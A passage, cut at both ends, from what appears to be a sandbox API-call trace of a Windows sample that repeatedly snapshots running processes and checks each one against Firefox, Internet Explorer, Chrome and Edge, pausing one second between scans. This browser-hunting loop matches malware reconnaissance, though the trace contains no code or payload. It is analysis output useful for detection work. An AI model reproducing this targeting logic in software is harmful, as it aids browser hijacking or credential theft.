dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0215.091] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0215.091] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0215.091] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0215.091] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.091] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0215.092] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0215.092] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0215.092] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0215.092] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.092] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0215.092] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0215.092] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0215.092] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0215.092] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.092] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0215.093] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0215.093] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0215.093] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0215.093] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.093] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0215.093] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0215.093] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0215.093] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0215.093] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.094] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0215.094] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0215.094] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0215.094] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0215.094] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.094] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0215.095] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0215.095] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0215.095] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0215.095] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.095] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0215.095] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0215.095] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0215.095] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0215.095] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.095] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0215.096] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0215.096] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0215.096] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0215.096] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.096] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0215.096] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0215.096] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0215.096] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0215.096] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.096] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0215.097] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0215.097] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0215.097] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0215.097] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.097] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0215.097] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0215.098] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0215.098] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0215.098] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.098] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0215.098] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0215.098] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0215.098] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0215.098] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.098] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0215.099] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0215.099] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0215.099] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0215.099] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.099] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0215.099] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0215.099] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0215.099] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0215.099] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.099] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0215.100] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0215.100] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0215.100] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0215.100] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.100] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0215.100] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0215.100] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0215.100] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0215.100] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.101] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0215.101] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0215.101] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0215.101] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0215.101] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.101] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0215.102] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0215.102] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0215.102] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0215.102] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.102] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0215.102] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0215.102] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0215.102] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0215.102] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.102] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.103] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0215.103] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0215.103] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0215.103] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.103] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0215.103] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0215.103] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0215.103] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0215.103] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.103] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.104] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0215.104] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0215.104] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0215.104] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.104] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0215.148] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0215.148] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0215.148] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0215.148] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.148] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.149] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0215.149] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0215.149] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0215.149] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.149] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0215.149] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0215.149] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0215.149] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0215.149] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.149] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0215.150] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0215.150] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0215.150] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0215.150] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.150] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.151] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0215.151] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0215.151] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0215.151] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.151] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.151] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0215.151] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0215.151] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0215.151] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.151] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.152] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0215.152] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0215.152] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0215.152] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.152] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.152] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0215.152] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0215.152] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0215.152] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.152] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0215.153] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0215.153] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0215.153] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0215.153] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0215.153] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0215.153] CloseHandle (hObject=0xd4) returned 1 [0215.154] Sleep (dwMilliseconds=0x3e8) [0216.236] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0216.238] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.239] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0216.239] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0216.239] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0216.239] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0216.239] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0216.239] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0216.239] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0216.239] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0216.239] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0216.240] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0216.240] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0216.240] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0216.240] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0216.240] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.240] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.241] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0216.241] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0216.241] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0216.241] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.241] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0216.241] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0216.241] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0216.241] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0216.241] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.241] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.242] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0216.242] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0216.242] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0216.242] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.242] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0216.242] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0216.243] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0216.243] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0216.243] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.243] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0216.243] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0216.243] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0216.243] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0216.243] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.243] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, 